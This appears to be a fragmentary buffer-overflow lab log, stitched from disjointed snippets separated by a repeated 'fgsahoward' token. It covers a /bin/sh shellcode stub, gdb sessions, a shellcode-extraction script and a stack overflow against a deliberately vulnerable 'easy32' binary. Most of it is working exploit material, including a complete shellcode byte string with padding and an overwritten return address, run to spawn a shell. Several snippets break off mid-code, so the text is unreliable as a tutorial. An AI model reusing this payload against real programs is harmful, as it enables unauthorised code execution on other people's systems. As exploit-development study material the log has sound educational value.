fgsahoward

##
#  shell3_64.s - Executes "/bin/sh"
#     Compile and Link:
#        gcc -c shell3_64.s
#        ld -o shell3_64 shell3_64.o
.global _start
.text

_start:
    xor %rdi, %rdi

fgsahoward

[howard@sterling shellcodes]$ gdb -q bin/shell3_64 
Reading symbols from bin/shell3_64...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/howard/repos/bof/shellcodes/bin/shell3_64 

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400088 in system_call ()
(gdb) disas system_call
Dump of assembler code for function system_call:
   0x000000000040007e <+0>:    mov    (%rsp),%r8

fgsahoward

[howard@sterling bin]$ ps aux | grep shell3
howard    2799  0.0  0.8  74464 25656 pts/2    S+   09:10   0:00 gdb -q bin/shell3_64
howard    2801  0.0  0.0    160    16 pts/2    t    09:10   0:00 /home/howard/repos/bof/shellcodes/bin/shell3_64
howard    2806  0.0  0.0  11052  2168 pts/1    S+   09:12   0:00 grep shell3
[howard@sterling bin]$ cat /proc/2801/maps
00400000-00401000 r-xp 00000000 08:02 1443291                            /home/howard/repos/bof/shellcodes/bin/shell3_64
7ffff7ffa000-7ffff7ffd000 r--p 00000000 00:00 0                          [vvar]
7ffff7ffd000-7ffff7fff000 r-xp 00000000 00:00 0                          [vdso]
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

fgsahoward

(gdb) x/xb $r8+7
0x4000b1 <shell+12>:    0x41

fgsahoward

[howard@sterling shellcodes]$ cat ../tools/otosc.py 
#!/usr/bin/python

##
#  Takes as input the ouput from:
#  objdump -Dz | grep "[0-9a-f]*?:" | cut -f 1,2
import sys

def main(inputs, outputfile):
    lines = [x.strip(" ") for x in inputs.split("\n")]

fgsahoward

[howard@sterling shellcodes]$ cat shell3_32.sc | wc -c
225
[howard@sterling shellcodes]$ python -c "print(hex(int(224 / 4)))"
0x38

fgsahoward

[howard@sterling shellcodes]$ gdb -q ../easy32 
Reading symbols from ../easy32...done.
(gdb) disas vulnerable
Dump of assembler code for function vulnerable:
   0x0804844b <+0>:    push   %ebp
   0x0804844c <+1>:    mov    %esp,%ebp
   0x0804844e <+3>:    sub    $0x408,%esp
   0x08048454 <+9>:    sub    $0x8,%esp
   0x08048457 <+12>:    pushl  0x8(%ebp)
   0x0804845a <+15>:    lea    -0x408(%ebp),%eax

fgsahoward

(gdb) r `perl -e 'print "A"x0x40c, "B"x0x4'`
Starting program: /home/howard/repos/bof/easy32 `perl -e 'print "A"x0x40c, "B"x0x4'`
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

fgsahoward

(gdb) r `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
                                     �����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

fgsahoward

[howard@sterling shellcodes]$ /home/howard/repos/bof/easy32 `perl -e 'print "\x31\xff\x57\xeb\x2b\x8b\x3c\x24\x31\xd2\xb2\x41\x30\x57\x07\x8b\x7c\x24\x04\x30\x57\x02\x8b\x1c\x24\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3d4, "\x80\xd1\xff\xff"'`
Input: 1�W�+�<$1ҲA0W�|$0W�$��1�1��
                                     �����/bin/shA�����-pAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA